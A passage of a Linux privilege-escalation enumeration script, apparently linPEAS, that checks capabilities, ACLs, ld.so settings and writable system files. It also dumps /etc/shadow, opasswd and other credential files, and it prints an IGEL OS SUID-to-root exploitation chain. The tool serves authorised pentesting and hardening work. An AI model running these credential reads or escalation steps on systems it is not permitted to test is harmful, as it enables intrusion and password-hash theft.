  11815                     printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
  11816                   fi
  11817                 elif echo "$sline_first" | grep -q "/" && [ -d "$(dirname "$sline_first")" ] && [ -w "$(dirname "$sline_first")" ]; then #If path does not exist but can be created
  11818                   printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can create it inside writable dir $RED$(dirname "$sline_first")$NC$ITALIC (strings line: $sline)\n"
  11819                 else #If not a path
  11820                   if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
  11821                     printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
  11822                   fi
  11823                 fi
  11824               fi
  11825             done
  11826           fi
  11827           if [ "$LDD" ] || [ "$READELF" ]; then
  11828             echo "$ITALIC  --- Checking for writable dependencies of $sname...$NC"
  11829           fi
  11830           if [ "$LDD" ]; then
  11831             "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
  11832           fi
  11833           if [ "$READELF" ]; then
  11834             "$READELF" -d "$sname" | grep PATH | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
  11835           fi
  11836           if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ -x "$sname" ]; then
  11837             printf $ITALIC
  11838             echo "----------------------------------------------------------------------------------------"
  11839             echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
  11840             OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
  11841             export LD_LIBRARY_PATH=""
  11842             timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
  11843             printf $NC
  11844             export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
  11845             echo "----------------------------------------------------------------------------------------"
  11846             echo ""
  11847           fi
  11848         fi
  11849       fi
  11850     fi
  11851   fi
  11852 done;
  11853 echo ""
  11854 
  11855 fi
  11856 
  11857 if check_mitre_filter "T1222"; then
  11858 print_2title "Files with ACLs (limited to 50)" "T1222"
  11859 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls"
  11860 if ! [ "$SEARCH_IN_FOLDER" ]; then
  11861   ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g"
  11862 else
  11863   ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g"
  11864 fi
  11865 if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl || echo -n '')" ]; then  #Find ACL files in macos (veeeery slow)
  11866   ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g"
  11867 fi
  11868 echo ""
  11869 
  11870 fi
  11871 
  11872 if check_mitre_filter "T1548.001,T1068"; then
  11873 if ! [ "$SEARCH_IN_FOLDER" ]; then
  11874   print_2title "Capabilities" "T1548.001"
  11875   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities"
  11876   if [ "$(command -v capsh || echo -n '')" ]; then
  11877     is_hex_cap_value() {
  11878       case "$1" in
  11879         ""|*[!0-9a-fA-F]*)
  11880           return 1
  11881           ;;
  11882       esac
  11883       return 0
  11884     }
  11885     print_cap_status() {
  11886       cap_status_file="$1"
  11887       cap_default_sep="$2"
  11888       cat "$cap_status_file" | grep Cap | while read -r cap_line; do
  11889         cap_name=$(echo "$cap_line" | awk '{print $1}')
  11890         cap_value=$(echo "$cap_line" | awk '{print $2}')
  11891         cap_sep="$cap_default_sep"
  11892         cap_color="$SED_RED"
  11893         if [ "$cap_name" = "CapEff:" ]; then
  11894           cap_sep="	 "
  11895           cap_color="$SED_RED_YELLOW"
  11896         fi
  11897         if is_hex_cap_value "$cap_value"; then
  11898           # Memory errors can occur with certain values (e.g., ffffffffffffffff)
  11899           # so we redirect stderr to prevent error propagation
  11900           echo "$cap_name$cap_sep$(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${cap_color},")"
  11901         else
  11902           echo "$cap_name$cap_sep[Invalid capability format]"
  11903         fi
  11904       done
  11905     }
  11906     print_3title "Current shell capabilities" "T1548.001"
  11907     print_cap_status "/proc/$$/status" "  "
  11908     echo ""
  11909     print_info "Parent process capabilities"
  11910     print_cap_status "/proc/$PPID/status" "	 "
  11911     echo ""
  11912     print_3title "Processes with capability sets (non-zero CapEff/CapAmb, limit 40)" "T1548.001"
  11913     find /proc -maxdepth 2 -path "/proc/[0-9]*/status" 2>/dev/null | head -n 400 | while read -r proc_status; do
  11914       proc_pid=$(echo "$proc_status" | cut -d/ -f3)
  11915       proc_name=$(awk '/^Name:/{print $2}' "$proc_status" 2>/dev/null)
  11916       proc_uid=$(awk '/^Uid:/{print $2}' "$proc_status" 2>/dev/null)
  11917       user_name=$(awk -F: -v uid="$proc_uid" '$3==uid{print $1; exit}' /etc/passwd 2>/dev/null)
  11918       [ -z "$user_name" ] && user_name="$proc_uid"
  11919       proc_inh=$(awk '/^CapInh:/{print $2}' "$proc_status" 2>/dev/null)
  11920       proc_prm=$(awk '/^CapPrm:/{print $2}' "$proc_status" 2>/dev/null)
  11921       proc_eff=$(awk '/^CapEff:/{print $2}' "$proc_status" 2>/dev/null)
  11922       proc_bnd=$(awk '/^CapBnd:/{print $2}' "$proc_status" 2>/dev/null)
  11923       proc_amb=$(awk '/^CapAmb:/{print $2}' "$proc_status" 2>/dev/null)
  11924       [ -z "$proc_eff" ] && continue
  11925       if [ "$proc_eff" != "0000000000000000" ] || [ "$proc_amb" != "0000000000000000" ]; then
  11926         echo "PID $proc_pid ($proc_name) user=$user_name"
  11927         proc_inh_dec=$(capsh --decode=0x"$proc_inh" 2>/dev/null)
  11928         proc_prm_dec=$(capsh --decode=0x"$proc_prm" 2>/dev/null)
  11929         proc_eff_dec=$(capsh --decode=0x"$proc_eff" 2>/dev/null)
  11930         proc_bnd_dec=$(capsh --decode=0x"$proc_bnd" 2>/dev/null)
  11931         proc_amb_dec=$(capsh --decode=0x"$proc_amb" 2>/dev/null)
  11932         echo "  CapInh: $proc_inh_dec" | sed -${E} "s,$capsB,${SED_RED},g"
  11933         echo "  CapPrm: $proc_prm_dec" | sed -${E} "s,$capsB,${SED_RED},g"
  11934         echo "  CapEff: $proc_eff_dec" | sed -${E} "s,$capsB,${SED_RED_YELLOW},g"
  11935         echo "  CapBnd: $proc_bnd_dec" | sed -${E} "s,$capsB,${SED_RED},g"
  11936         echo "  CapAmb: $proc_amb_dec" | sed -${E} "s,$capsB,${SED_RED_YELLOW},g"
  11937         echo ""
  11938       fi
  11939     done | head -n 240
  11940     echo ""
  11941   else
  11942     print_3title "Current shell capabilities" "T1548.001"
  11943     (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
  11944     echo ""
  11945     print_3title "Parent proc capabilities" "T1548.001"
  11946     (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status"
  11947     echo ""
  11948   fi
  11949   echo ""
  11950   echo "Files with capabilities (limited to 50):"
  11951   getcap -r / 2>/dev/null | head -n 50 | while read cb; do
  11952     capsVB_vuln=""
  11953     for capVB in $capsVB; do
  11954       capname="$(echo $capVB | cut -d ':' -f 1)"
  11955       capbins="$(echo $capVB | cut -d ':' -f 2)"
  11956       if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then
  11957         echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  11958         capsVB_vuln="1"
  11959         break
  11960       fi
  11961     done
  11962     if ! [ "$capsVB_vuln" ]; then
  11963       echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
  11964     fi
  11965     if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then
  11966       echo "$cb is writable" | sed -${E} "s,.*,${SED_RED},"
  11967     fi
  11968   done
  11969   echo ""
  11970   checkSnapConfineCVE20268933
  11971 fi
  11972 
  11973 fi
  11974 
  11975 if check_mitre_filter "T1548.001"; then
  11976 if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ] || grep -Rqs "pam_cap\.so" /etc/pam.d /etc/pam.conf 2>/dev/null; then
  11977   print_2title "Users with capabilities" "T1548.001"
  11978   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities"
  11979   if [ -f "/etc/security/capability.conf" ]; then
  11980     grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED},g"
  11981   else echo_not_found "/etc/security/capability.conf"
  11982   fi
  11983   echo ""
  11984   print_info "Checking if PAM loads pam_cap.so"
  11985   pam_cap_lines=$(grep -RIn "pam_cap\.so" /etc/pam.d /etc/pam.conf 2>/dev/null)
  11986   if [ "$pam_cap_lines" ]; then
  11987     printf "%s\n" "$pam_cap_lines" | sed -${E} "s,pam_cap\\.so,${SED_RED_YELLOW},g"
  11988   else
  11989     echo_not_found "pam_cap.so in /etc/pam.d or /etc/pam.conf"
  11990   fi
  11991   echo ""
  11992 fi
  11993 
  11994 fi
  11995 
  11996 if check_mitre_filter "T1574.006"; then
  11997 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then
  11998   print_2title "Checking misconfigurations of ld.so" "T1574.006"
  11999   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso"
  12000   if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then 
  12001     echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
  12002     printf $RED$ITALIC"/etc/ld.so.conf\n"$NC;
  12003   else
  12004     printf $GREEN$ITALIC"/etc/ld.so.conf\n"$NC;
  12005   fi
  12006   echo "Content of /etc/ld.so.conf:"
  12007   cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
  12008   # Check each configured folder and include directives
  12009   cat /etc/ld.so.conf 2>/dev/null | while IFS= read -r l; do
  12010     l=$(echo "$l" | sed 's/#.*$//' | xargs 2>/dev/null)
  12011     [ -z "$l" ] && continue
  12012     if echo "$l" | grep -qE '^include[[:space:]]+'; then
  12013       ini_path=$(echo "$l" | cut -d " " -f 2)
  12014       fpath=$(dirname "$ini_path")
  12015       if [ -d "$fpath" ] && [ -w "$fpath" ]; then
  12016         echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},";
  12017         printf $RED_YELLOW$ITALIC"$fpath\n"$NC;
  12018       else
  12019         printf $GREEN$ITALIC"$fpath\n"$NC;
  12020       fi
  12021       if [ "$(find "$fpath" -type f '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then
  12022         echo "You have write privileges over $(find "$fpath" -type f '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},";
  12023       fi
  12024       for f in $ini_path; do
  12025         [ -f "$f" ] || continue
  12026         if [ -w "$f" ]; then
  12027           echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},";
  12028           printf $RED_YELLOW$ITALIC"$f\n"$NC;
  12029         else
  12030           printf $GREEN$ITALIC"  $f\n"$NC;
  12031         fi
  12032         cat "$f" 2>/dev/null | grep -v "^#" | while IFS= read -r l2; do
  12033           l2=$(echo "$l2" | xargs 2>/dev/null)
  12034           [ -z "$l2" ] && continue
  12035           if [ -d "$l2" ] && [ -w "$l2" ]; then
  12036             echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},";
  12037             printf $RED_YELLOW$ITALIC"  - $l2\n"$NC;
  12038           elif [ -d "$l2" ]; then
  12039             echo $ITALIC"  - $l2"$NC | sed -${E} "s,$ldsoconfdG,${SED_GREEN},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g";
  12040           fi
  12041         done
  12042       done
  12043     elif [ -d "$l" ] && [ -w "$l" ]; then
  12044       echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},";
  12045       printf $RED_YELLOW$ITALIC"$l\n"$NC;
  12046     else
  12047       echo $ITALIC"$l"$NC | sed -${E} "s,$ldsoconfdG,${SED_GREEN},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g";
  12048     fi
  12049   done
  12050   echo ""
  12051   if [ -f "/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then 
  12052     echo "You have write privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
  12053   else
  12054     printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC;
  12055   fi
  12056   cat /etc/ld.so.preload 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
  12057   cat /etc/ld.so.preload 2>/dev/null | while read l; do
  12058     if [ -f "$l" ] && [ -w "$l" ]; then echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
  12059   done
  12060 fi
  12061 
  12062 fi
  12063 
  12064 if check_mitre_filter "T1546.004"; then
  12065 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12066   print_2title "Files (scripts) in /etc/profile.d/" "T1546.004"
  12067   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files"
  12068   if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
  12069     (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
  12070     check_critial_root_path "/etc/profile"
  12071     check_critial_root_path "/etc/profile.d/"
  12072   fi
  12073   echo ""
  12074 fi
  12075 
  12076 fi
  12077 
  12078 if check_mitre_filter "T1543.002"; then
  12079 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12080 print_2title "Permissions in init, init.d, systemd, and rc.d" "T1543.002"
  12081   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd"
  12082   if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
  12083     check_critial_root_path "/etc/init/"
  12084     check_critial_root_path "/etc/init.d/"
  12085     check_critial_root_path "/etc/rc.d/init.d"
  12086     check_critial_root_path "/usr/local/etc/rc.d"
  12087     check_critial_root_path "/etc/rc.d"
  12088     check_critial_root_path "/etc/systemd/"
  12089     check_critial_root_path "/lib/systemd/"
  12090   fi
  12091   echo ""
  12092 fi
  12093 
  12094 fi
  12095 
  12096 if check_mitre_filter "T1518.001"; then
  12097 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12098   if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then
  12099     print_2title "AppArmor binary profiles" "T1518.001"
  12100     ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\."
  12101     echo ""
  12102   fi
  12103 fi
  12104 
  12105 fi
  12106 
  12107 if check_mitre_filter "T1552.001"; then
  12108 ##-- IPF) Hashes in passwd file
  12109 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12110   print_list "Hashes inside passwd file? ........... "
  12111   if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  12112   else echo_no
  12113   fi
  12114   ##-- IPF) Writable in passwd file
  12115   print_list "Writable passwd file? ................ "
  12116   if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12117   elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12118   elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12119   else echo_no
  12120   fi
  12121   ##-- IPF) Credentials in fstab
  12122   print_list "Credentials in fstab/mtab? ........... "
  12123   if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  12124   else echo_no
  12125   fi
  12126   ##-- IPF) Read shadow files
  12127   print_list "Can I read shadow files? ............. "
  12128   if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  12129   else echo_no
  12130   fi
  12131   print_list "Can I read shadow plists? ............ "
  12132   possible_check=""
  12133   (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
  12134   print_list "Can I write shadow plists? ........... "
  12135   possible_check=""
  12136   (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
  12137   ##-- IPF) Read opasswd file
  12138   print_list "Can I read opasswd file? ............. "
  12139   if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
  12140   else echo_no
  12141   fi
  12142   ##-- IPF) network-scripts
  12143   print_list "Can I write in network-scripts? ...... "
  12144   if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12145   elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12146   else echo_no
  12147   fi
  12148   ##-- IPF) Read root dir
  12149   print_list "Can I read root folder? .............. "
  12150   (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
  12151   echo ""
  12152 fi
  12153 
  12154 fi
  12155 
  12156 if check_mitre_filter "T1083"; then
  12157 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12158   print_2title "Searching root files in home dirs (limit 30)" "T1083"
  12159   (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found
  12160   echo ""
  12161 fi
  12162 
  12163 fi
  12164 
  12165 if check_mitre_filter "T1083"; then
  12166 if ! [ "$IAMROOT" ]; then
  12167   print_2title "Searching folders owned by me containing others files on it (limit 100)" "T1083"
  12168   (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
  12169   echo ""
  12170 fi
  12171 
  12172 fi
  12173 
  12174 if check_mitre_filter "T1083"; then
  12175 if ! [ "$IAMROOT" ]; then
  12176   print_2title "Readable files belonging to root and readable by me but not world readable" "T1083"
  12177   (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
  12178   echo ""
  12179 fi
  12180 
  12181 fi
  12182 
  12183 if check_mitre_filter "T1574.009,T1574.010"; then
  12184 if ! [ "$IAMROOT" ]; then
  12185   print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 200)" "T1574.009,T1574.010"
  12186   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files"
  12187   #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
  12188   obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "/dev/*" ! -path "/snap/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200)
  12189   printf "%s\n" "$obmowbe" | while read l; do
  12190     if echo "$l" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$l\n"$NC;
  12191     elif echo "$l" | grep -qE "$writeVB"; then
  12192       echo "$l" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
  12193     else
  12194       echo "$l" | sed -${E} "s,$writeB,${SED_RED},"
  12195     fi
  12196   done
  12197   echo ""
  12198 fi
  12199 
  12200 fi
  12201 
  12202 if check_mitre_filter "T1574.009,T1574.010"; then
  12203 if ! [ "$IAMROOT" ]; then
  12204   print_2title "Interesting GROUP writable files (not in Home) (max 200)" "T1574.009,T1574.010"
  12205   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files"
  12206   for g in $(groups); do
  12207     iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200)
  12208     if [ "$iwfbg" ] || [ "$DEBUG" ]; then
  12209       printf "  Group $GREEN$g:\n$NC";
  12210       printf "%s\n" "$iwfbg" | while read l; do
  12211         if echo "$l" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$l\n"$NC;
  12212         elif echo "$l" | grep -Eq "$writeVB"; then
  12213           echo "$l" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
  12214         else
  12215           echo "$l" | sed -${E} "s,$writeB,${SED_RED},"
  12216         fi
  12217       done
  12218     fi
  12219   done
  12220   echo ""
  12221 fi
  12222 
  12223 fi
  12224 
  12225 if check_mitre_filter "T1548.001"; then
  12226 igel_markers=""
  12227 igel_marker_sources=""
  12228 if [ -f /etc/os-release ] && grep -qi "igel" /etc/os-release 2>/dev/null; then
  12229   igel_markers="Yes"
  12230   igel_marker_sources="/etc/os-release"
  12231 fi
  12232 if [ -f /etc/issue ] && grep -qi "igel" /etc/issue 2>/dev/null; then
  12233   igel_markers="Yes"
  12234   igel_marker_sources="${igel_marker_sources} /etc/issue"
  12235 fi
  12236 for marker in /etc/igel /wfs/igel /userhome/.igel /config/sessions/igel; do
  12237   if [ -e "$marker" ]; then
  12238     igel_markers="Yes"
  12239     igel_marker_sources="${igel_marker_sources} $marker"
  12240   fi
  12241 done
  12242 igel_suid_hits=""
  12243 for candidate in /usr/bin/setup /bin/setup /usr/sbin/setup /opt/igel/bin/setup /usr/bin/date /bin/date /usr/lib/igel/date; do
  12244   if [ -u "$candidate" ]; then
  12245     igel_suid_hits="${igel_suid_hits}$(ls -lah "$candidate" 2>/dev/null)\n"
  12246   fi
  12247 done
  12248 if [ -n "$igel_markers" ] || [ -n "$igel_suid_hits" ]; then
  12249   print_2title "IGEL OS SUID setup/date privilege escalation surface" "T1548.001"
  12250   print_info "https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025"
  12251   if [ -n "$igel_markers" ]; then
  12252     echo "Potential IGEL OS detected via: $igel_marker_sources" | sed -${E} "s,.*,${SED_GREEN},"
  12253   else
  12254     echo "IGEL-specific SUID helpers found but IGEL markers were not detected" | sed -${E} "s,.*,${SED_RED},"
  12255   fi
  12256   if [ -n "$igel_suid_hits" ]; then
  12257     echo "SUID-root helpers exposing configuration primitives:" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12258     printf "%b" "$igel_suid_hits"
  12259   else
  12260     echo "No SUID setup/date binaries were located (system may be patched)."
  12261   fi
  12262   writable_nm=""
  12263   writable_systemd=""
  12264   if ! [ "$SUPERFAST" ]; then
  12265     if [ -d /etc/NetworkManager ]; then
  12266       writable_nm=$(find /etc/NetworkManager -maxdepth 3 -type f -writable 2>/dev/null | head -n 25)
  12267     fi
  12268     for unitdir in /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system; do
  12269       if [ -d "$unitdir" ]; then
  12270         tmp_units=$(find "$unitdir" -maxdepth 2 -type f -writable 2>/dev/null | head -n 15)
  12271         if [ -n "$tmp_units" ]; then
  12272           writable_systemd="${writable_systemd}${tmp_units}\n"
  12273         fi
  12274       fi
  12275     done
  12276   fi
  12277   if [ -n "$writable_nm" ]; then
  12278     echo "Writable NetworkManager profiles/hooks (swap Exec path to your payload):" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12279     echo "$writable_nm"
  12280   fi
  12281   if [ -n "$writable_systemd" ]; then
  12282     echo "Writable systemd unit files (edit ExecStart, then restart via setup/date):" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12283     printf "%b" "$writable_systemd"
  12284   fi
  12285   printf "$ITALIC  Known exploitation chain: Use the SUID setup/date binaries to edit NetworkManager or systemd configs so ExecStart points to your payload, then trigger a service restart via the same helper to run as root (Metasploit linux/local/igel_network_priv_esc).$NC\n"
  12286 fi
  12287 echo ""
  12288 
  12289 fi
  12290 
  12291 if check_mitre_filter "T1574.009,T1574.010"; then
  12292 if ! [ "$IAMROOT" ]; then
  12293   print_2title "Writable root-owned executables I can modify (max 200)" "T1574.009,T1574.010"
  12294   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files"
  12295   writable_root_execs=$(
  12296     find "$ROOT_FOLDER" -type f -user root -perm -u=x \
  12297       \( -perm -g=w -o -perm -o=w \) \
  12298       ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/snap/*" ! -path "$HOME/*" 2>/dev/null \
  12299       | while IFS= read -r f; do
  12300           if [ -w "$f" ]; then
  12301             ls -l "$f" 2>/dev/null
  12302           fi
  12303         done | head -n 200
  12304   )
  12305   if [ "$writable_root_execs" ] || [ "$DEBUG" ]; then
  12306     printf "%s\n" "$writable_root_execs" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
  12307   else
  12308     echo_not_found "Writable root-owned executables"
  12309   fi
  12310   echo ""
  12311 fi
  12312 
  12313 fi
  12314 
  12315 fi
  12316 
  12317 fi
  12318 echo ''
  12319 echo ''
  12320 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
  12321 
  12322 if echo $CHECKS | grep -q interesting_files; then
